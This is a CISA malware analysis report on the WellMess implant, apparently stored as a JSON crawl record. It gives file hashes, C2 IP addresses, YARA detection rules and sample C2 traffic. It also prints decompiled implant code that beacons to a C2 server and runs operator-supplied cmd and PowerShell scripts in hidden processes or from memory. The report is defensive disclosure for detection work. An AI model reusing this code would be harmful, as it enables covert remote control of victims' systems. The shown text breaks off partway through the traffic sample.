{
	"id": "230fe254-43fe-4472-9c47-407ca07d055a",
	"created_at": "2026-04-06T00:18:10.781086Z",
	"updated_at": "2026-04-10T03:37:16.845436Z",
	"deleted_at": null,
	"sha1_hash": "5efc88b09fcecce99d033cb200a80dcf53584f3b",
	"title": "MAR-10296782-2.v1 – WELLMESS | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 176902,
	"plain_text": "MAR-10296782-2.v1 – WELLMESS | CISA\r\nPublished: 2020-07-16 · Archived: 2026-04-05 17:48:48 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThe Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security\r\nAgency (CISA). This malware has been identified as WELLMESS. Advanced persistent threat (APT) groups have been\r\nidentified using this malware. For more information regarding this malware, please visit:\r\nhttps://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development\r\nThis report analyzes six unique files. The files are variants of the malware family known as \"WellMess\". These implants\r\nallow a remote operator to establish encrypted command and control (C2) sessions and to securely pass and execute scripts\r\non an infected system.\r\nThe WellMess samples include one 32-bit Windows executable and five Executable and Linkable Format (ELF) files written\r\nin Go, an open source programming language. The report includes analysis of a compiled .NET application extracted from\r\none of the 32-bit Windows executables.\r\nThe ELF and 32-bit Windows executables have similar functionality; both collect the state of system privileges (disabled or\r\nenabled) from the infected system and encrypt the data via a Rivest cipher 6 (RC6) algorithm, then dynamically generate\r\nAdvanced Encryption Standard (AES) keys, which are exchanged via a Rivest–Shamir–Adleman (RSA) secured key\r\ntransfer scheme. Both versions also allow an operator to pass AES encrypted executable scripts to infected systems.\r\nFor a downloadable copy of IOCs, see MAR-10296782-2.v1.stix.\r\nSubmitted Files (6)\r\n14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2 (14e9b5e214572cb13ff87727d68063...)\r\n5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb (5ca4a9f6553fea64ad2c724bf71d0f...)\r\n7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee (7c39841ba409bce4c2c35437ecf043...)\r\n953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a (953b5fc9977e2d50f3f72c6ce85e89...)\r\ne329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09 (e329607379a01483fc914a47c0062d...)\r\nfd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950 (fd3969d32398bbe3709e9da5f83269...)\r\nAdditional Files (1)\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854 (WellMess.net.extract.bin)\r\nIPs (5)\r\n103.73.188.101\r\n141.98.212.55\r\n192.48.88.107\r\n209.58.186.196\r\n85.93.2.116\r\nFindings\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 1 of 44\n\n953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nTags\r\ntrojan\r\nDetails\r\nName 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nSize 172032 bytes\r\nType PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 f18ced8772e9d1a640b8b4a731dfb6e0\r\nSHA1 92f7b470c5a2c95a4df04c2c5cd50780f6dbdda1\r\nSHA256 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nSHA512 c4ac5332ee27b3da002c8a55a1e99aefeb503a69b8eb1ce9310bcb12131d56d2efe70f50942461ec9e7c628e3d1a5f13c92faa6bb6b1c263acbe4\r\nssdeep 1536:Lo7PHWHfGE50u3J0cMuNJdbOYOL68q4ATMMx4pnMgqZ5C/yOCy2UpiPKsNoeIlnt:E7PHwJdbJOOvkuC/yOH2CiP0ie1XF\r\nEntropy 3.887546\r\nAntivirus\r\nBitDefender Gen:Variant.Razy.279280\r\nClamAV Win.Trojan.WellMess-6706033-0\r\nEmsisoft Gen:Variant.Razy.279280 (B)\r\nMcAfee GenericRXEI-SR!F18CED8772E9\r\nNANOAV Trojan.Win32.WellMess.fignvr\r\nQuick Heal Trojan.Wellmess\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 2 of 44\n\nSHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\n    SHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 3 of 44\n\n$21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\n    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-28 07:14:10-04:00\r\nImport Hash f34d5f2d4577ed6d9ceec516c1f5a744\r\nCompany Name Microsoft Corporation\r\nFile Description Power Settings Command-Line Tool\r\nInternal Name powercfg.exe\r\nLegal Copyright © Microsoft Corporation. All rights reserved.\r\nOriginal Filename powercfg.exe\r\nProduct Name Microsoft® Windows® Operating System\r\nProduct Version 6.1.7600.16385 (win7_rtm.090713-1255)\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nb90f84adffd98c3c63291dc54f766f18 header 4096 0.462120\r\n25e1daba00e54a31c1d9bb459988f669 .text 159744 4.056043\r\nbb5030c93de573a2819699404e0436be .rsrc 4096 2.256683\r\nf662c2f95c916d5bd4f0c939236a81e9 .reloc 4096 0.016408\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# v7.0 / Basic .NET\r\nRelationships\r\n953b5fc997... Created 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nDescription\r\nThis file is a malicious compiled .NET application. It decrypts and loads an embedded dynamic link library (DLL)\r\n\"WellMess.net.extract.bin\" (47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854).\r\nScreenshots\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 4 of 44\n\nFigure 1 - Screenshot of the code structure which decrypts the embedded DLL.\r\n47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nTags\r\ntrojan\r\nDetails\r\nName WellMess.net.extract.bin\r\nSize 45056 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 507bb551bd7073f846760d8b357b7aa9\r\nSHA1 23033dcad2d60574ea8a65862431f46b950e54c3\r\nSHA256 47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\r\nSHA512 fbad8f6e4c2a49ad7e030bfc069b830027942383a5429ac129ba4880c7f90d9e1ec84186755cbb61c39b41096d7969fa5e1e7a13918d1677045f\r\nssdeep 768:vLTf79aYYuGhmohyWdDZo/G9sklJL+9Ok/JSbrvfMAQ:/fMtYG9PB+9OyYXHhQ\r\nEntropy 4.625315\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nrule CISA_10296782_01 : trojan WELLMESS\r\n{\r\nmeta:\r\n    Author = \"CISA Code \u0026 Media Analysis\"\r\n    Date= \"2020-07-06\"\r\n    Last_Modified=\"20200706_1017\"\r\n    Actor=\"n/a\"\r\n    Category=\"Trojan\"\r\n    Family=\"WellMess\"\r\n    Description = \"Detects WellMess implant and SangFor Exploit\"\r\n    MD5_1 = \"4d38ac3319b167f6c8acb16b70297111\"\r\n    SHA256_1 = \"7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee\"\r\n    MD5_2 = \"a32e1202257a2945bf0f878c58490af8\"\r\n    SHA256_2 = \"a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064\"\r\n    MD5_3 = \"861879f402fe3080ab058c0c88536be4\"\r\n    SHA256_3 = \"14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2\"\r\n    MD5_4 = \"2f9f4f2a9d438cdc944f79bdf44a18f8\"\r\n    SHA256_4 = \"e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09\"\r\n    MD5_5 = \"ae7a46529a0f74fb83beeb1ab2c68c5c\"\r\n    SHA256_5 = \"fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950\"\r\n    MD5_6 = \"f18ced8772e9d1a640b8b4a731dfb6e0\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 5 of 44\n\nSHA256_6 = \"953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\"\r\n    MD5_7 = \"3a9cdd8a5cbc3ab10ad64c4bb641b41f\"\r\n    SHA256_7 = \"5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb\"\r\n    MD5_8 = \"967fcf185634def5177f74b0f703bdc0\"\r\n    SHA256_8 = \"58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2\"\r\n    MD5_9 = \"c5d5cb99291fa4b2a68b5ea3ff9d9f9a\"\r\n    SHA256_9 = \"65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75\"\r\n    MD5_10 = \"01d322dcac438d2bb6bce2bae8d613cb\"\r\n    SHA256_10 = \"0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494\"\r\n    MD5_11 = \"8777a9796565effa01b03cf1cea9d24d\"\r\n    SHA256_11 = \"83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18\"\r\n    MD5_12 = \"507bb551bd7073f846760d8b357b7aa9\"\r\n    SHA256_12 = \"47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854\"\r\nstrings:\r\n    $0 = \"/home/ubuntu/GoProject/src/bot/botlib/chat.go\"\r\n    $1 = \"/home/ubuntu/GoProject/src/bot/botlib.Post\"\r\n    $2 = \"GoProject/src/bot/botlib.deleteFile\"\r\n    $3 = \"ubuntu/GoProject/src/bot/botlib.generateRandomString\"\r\n    $4 = \"GoProject/src/bot/botlib.AES_Decrypt\"\r\n    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }\r\n    $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }\r\n    $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }\r\n    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }\r\n    $9 = \"get_keyRC6\"\r\n    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }\r\n    $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }\r\n    $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }\r\n    $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }\r\n    $14 = \"GoProject/src/bot/botlib.wellMess\"\r\n    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }\r\n    $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }\r\n    $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }\r\n    $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }\r\n    $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }\r\n    $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }\r\n    $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }\r\n    $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }\r\n    $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }\r\n    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61\r\n72 67 3E 2E 2A 3F }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 6 of 44\n\n$25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }\r\n    $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }\r\n    $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }\r\ncondition:\r\n   ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14)\r\nor ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)\r\n}\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2018-03-27 09:22:21-04:00\r\nImport Hash dae02f32a21e03ce65412f6e56942daa\r\nCompany Name Microsoft Corporation\r\nFile Description  \r\nInternal Name x643.Microsoft.Dtc.PowerShell.dll\r\nLegal Copyright Copyright (c) Microsoft Corporation. All rights reserved.\r\nOriginal Filename x643.Microsoft.Dtc.PowerShell.dll\r\nProduct Name Microsoft (R) Windows (R) Operating System\r\nProduct Version 10.0.14393.0\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n668481e5e1971f610581ea0b01b617b5 header 4096 0.434226\r\nced7014e20c39fba49386f6aef5e1203 .text 32768 5.701312\r\n1d4922f19bd3e79cfdf93cd91be7af27 .rsrc 4096 1.150437\r\nda55cd9f0f50ad5c82000ca03bfaa4be .reloc 4096 0.013127\r\nPackers/Compilers/Cryptors\r\nMicrosoft Visual C# v7.0 / Basic .NET\r\nRelationships\r\n47cdb87c27... Connected_To 85.93.2.116\r\n47cdb87c27... Created_By 953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a\r\nDescription\r\nThis file is a compiled .NET application. It has been identified as a variant of the WellMess malware family. Displayed\r\nbelow is a function named “HXYGVr()” which was extracted from this application:\r\n—Begin Extracted Function—\r\npublic void HXYGVr()\r\n   {\r\n    Variable.url = \"hxxp[:]//85.93.2.116\";\r\n    string Address = \"\";\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 7 of 44\n\nVariable.proxy = !string.IsNullOrEmpty(Address) ? new WebProxy(Address) : (WebProxy) null;\r\n    Variable.serverType = \"GO\";\r\n    Variable.userAgent = \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0\";\r\n    Variable.maxPostSize = 5000000;\r\n    Variable.keyRC6 = \"UJqqarUGKm1kR1mQMf5K2g==\";\r\n    Key publicKey;\r\n    publicKey.keySize = 2048;\r\n    publicKey.publicKey = \"\u003cRSAKeyValue\u003e\r\n\u003cModulus\u003e4Dy24gTFNYA/jq6SYiAkdRvY1ieWqM9R8dwo0uL+4GzaRObZEoUaZSHhvfeD1v762+duL1LgAcuXJeRg4PB4cGdpZqjKtB2BKIDJv3h2\r\n\u003c/Modulus\u003e\u003cExponent\u003eAQAB\u003c/Exponent\u003e\u003c/RSAKeyValue\u003e\";\r\n    Variable.interval = 12.0;\r\n    if (!this.IsInit)\r\n    {\r\n       Init init = new Init(publicKey);\r\n       this.Hash = Variable.hash;\r\n       this.Skey = Variable.keySymm;\r\n       this.IsInit = true;\r\n       this.Ua = Variable.userAgent;\r\n       this.MaxPostSize = Variable.maxPostSize;\r\n       this.HealthInterval = Variable.interval;\r\n    }\r\n    else\r\n    {\r\n       Variable.hash = this.Hash;\r\n       Variable.keySymm = this.Skey;\r\n       Variable.userAgent = this.Ua;\r\n       Variable.maxPostSize = this.MaxPostSize;\r\n       Variable.interval = this.HealthInterval;\r\n       Dictionary\u003cstring, string\u003e segmentsMessage = Chat.Download(Variable.hash, \"rc\", string.Empty);\r\n       if (segmentsMessage[\"head\"] == \"G\")\r\n       {\r\n        this.Complete = true;\r\n        if (!this.Hx)\r\n           return;\r\n        Chat.Send(Encoding.UTF8.GetBytes(\"Missed me?\"), Variable.keySymm, Variable.hash + \"/h\", \"a\", \"h\",\r\nVariable.maxPostSize);\r\n       }\r\n       else if (segmentsMessage[\"head\"] == \"C\")\r\n       {\r\n        new Chunks().Join((object) new ChatParameters()\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 8 of 44\n\n{\r\n           segmentsMessage = segmentsMessage\r\n        });\r\n        this.Complete = false;\r\n        Thread.Sleep(20000);\r\n       }\r\n       else if (segmentsMessage[\"service\"] == \"p\")\r\n       {\r\n        Init init = new Init(publicKey);\r\n        this.Hash = Variable.hash;\r\n        this.Skey = Variable.keySymm;\r\n        this.Complete = false;\r\n       }\r\n       else\r\n       {\r\n        new Choise().Work(segmentsMessage);\r\n        this.Complete = false;\r\n        this.Ua = Variable.userAgent;\r\n        this.MaxPostSize = Variable.maxPostSize;\r\n        this.HealthInterval = Variable.interval;\r\n       }\r\n    }\r\n—End Extracted Function—\r\nThis function appears to be the main export of the DLL, which initiates a C2 session with the implants remote C2 server at\r\nthe Internet Protocol (IP) address, 85.93.2.116. Contained within the function is a public RSA key utilized by the malware to\r\nsecure communication with its C2 server. The function also contains an RC6 cryptographic key, which is utilized to secure\r\nstate information within the C2 sessions, such as a unique hash value which is generated to identify the unique target system.\r\nThe malware accepts and executes PowerShell and batch scripts from a remote operator on the infected system. These\r\nexecutable scripts will be provided within a C2 session that is secured with AES encryption. In addition, the AES key\r\ntransfer process between the implant and the remote operator will be encrypted utilizing RSA asymmetric cryptography\r\nmaking the detection of malicious executable code traveling over the network difficult to detect. The function which\r\nprovides the script execution capability is illustrated below. Note: the execution of a script using this method will result in a\r\nseparate malicious process:\r\n—Begin Command Function—\r\npublic void Command(object message)\r\n   {\r\n    ChatParameters chatParameters = (ChatParameters) message;\r\n    try\r\n    {\r\n       string s = string.Empty;\r\n       Match match = new Regex(\"fileName:(?\u003cfn\u003e.*?)\\\\sargs:(?\u003carg\u003e.*)\\\\snotwait:(?\u003cnw\u003e.*)\", RegexOptions.IgnoreCase |\r\nRegexOptions.Multiline | RegexOptions.Singleline).Match(chatParameters.segmentsMessage[\"body\"]);\r\n       string str1 = match.Result(\"${fn}\").ToString();\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 9 of 44\n\nstring script = match.Result(\"${arg}\").ToString();\r\n       string str2 = match.Result(\"${nw}\").ToString();\r\n       Process process = new Process();\r\n       ProcessStartInfo processStartInfo = new ProcessStartInfo();\r\n       processStartInfo.CreateNoWindow = true;\r\n       processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;\r\n       processStartInfo.UseShellExecute = false;\r\n       processStartInfo.RedirectStandardOutput = true;\r\n       processStartInfo.FileName = str1;\r\n       if (str1 == \"powershellScript\")\r\n       {\r\n        s = BotChat.Pshell(script);\r\n       }\r\n       else\r\n       {\r\n        if (!string.IsNullOrEmpty(script))\r\n           processStartInfo.Arguments = !(str1 == \"cmd.exe\") ? script : \"/c \" + script;\r\n        process.StartInfo = processStartInfo;\r\n        process.Start();\r\n        if (string.IsNullOrEmpty(str2))\r\n        {\r\n           s = process.StandardOutput.ReadToEnd();\r\n           process.WaitForExit();\r\n        }\r\n       }\r\n       process.Close();\r\n       this.Reply(Encoding.UTF8.GetBytes(s), chatParameters.segmentsMessage[\"head\"],\r\nchatParameters.segmentsMessage[\"service\"]);\r\n    }\r\n    catch (Exception ex)\r\n    {\r\n       this.Reply(Encoding.UTF8.GetBytes(ex.Message.ToString()), chatParameters.segmentsMessage[\"head\"],\r\nchatParameters.segmentsMessage[\"service\"]);\r\n       Thread.Sleep(1000);\r\n    }\r\n   }\r\n—End Command Function—\r\nThe implant can also run PowerScripts scripts directly from memory. The malware contains the following function\r\nproviding this capability. Note: executing a PowerShell script using this method will not result in a separate malicious\r\nprocess.\r\n—Begin PowerShell Function—\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 10 of 44\n\nprivate static string Pshell(string script)\r\n   {\r\n    string empty = string.Empty;\r\n    Collection\u003cPSObject\u003e collection;\r\n    using (Runspace runspace = RunspaceFactory.CreateRunspace())\r\n    {\r\n       try\r\n       {\r\n        runspace.Open();\r\n        using (PowerShell powerShell = PowerShell.Create())\r\n        {\r\n           powerShell.Runspace = runspace;\r\n           ScriptBlock scriptBlock = ScriptBlock.Create(script);\r\n           powerShell.AddCommand(\"Invoke-Command\").AddParameter(\"ScriptBlock\", (object) scriptBlock);\r\n           collection = powerShell.Invoke();\r\n        }\r\n       }\r\n       finally\r\n       {\r\n        runspace.Close();\r\n       }\r\n    }\r\n    foreach (PSObject psObject in collection)\r\n       empty += psObject.ToString();\r\n    return empty;\r\n   }\r\n—End PowerShell Function—\r\nDisplayed below is sample communication traffic between this WellMess implant and its C2 server.\r\n—Begin Sample Network Traffic—\r\nPOST / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html, */*\r\nAccept-Language: en-US,en;q=0.8\r\nCookie:\r\n4NJZrNBl=80WOGU+5py+Cq0GVi+JMiq6ka+x%3aGeT+%3a7jpfqo+q1%3aa+6j9Delt+yDQ+SpTmS5+T5TpR.+DwUNdr+gjsJf+svT+Byw+sysM.+A\r\nHost: 85.93.2.116\r\nContent-Length: 798\r\nExpect: 100-continue\r\nAccept-Encoding: deflate\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b\r\nPage 11 of 44\n\nConnection: Keep-Alive\r\nPXYaTG AoW 0gVV4R xKRORQU em5Jz OqxrlVM PweS oOVI30A 1oZ OgLqNp JyA1q. Dos2gp N0c3C q:d tKX IdNx.\r\nzkTbV QmOjB HXU::fP eUN4 jBOI. RlCFb xOTaSL C0k:BKg EGVy fsoDDZ. arfb ,2fvY xYlkGpW ,D6 ikXZ6. kJT\r\n6N82Au ,2Uf t7mOYW9 DLyAy. CF60ZX TIswg X7XBA: E6Xj2a unGhGIR. fir 1rH1jkG QPEc t1I53 iED. aomEaY\r\nn84rKx ECxZ0K yeDLh4 suZyqzp. ITxjQq b58:jvm lsOT AC,o mlM1. V3oUd U6bU:y8 WzJ8t pWUN76I KxnVY3.\r\nuUTz,K jDK qba yqU 1AvBN. pVg 3Duu 34IA g9jZc pr77J. 0h8lQGU lm3ReWd F2SB 7Yes fk1J. ndl8o tpzJ NhXH bjNO\r\n8nm:Aqm. l0HHBo dOypefA hja IAQ ,NUHFF7. yt, F:Gp OU1 S3e4GZ NU7HvZW. hAINPwR kDCE2Ev cQiiXU TXY\r\nKpt. prnvUns el4sMa 9do tw: eisS58C. d2wKh :T0F kxk mZTI jU1. 4y:Y6l YQgZ6t 0uANCK2 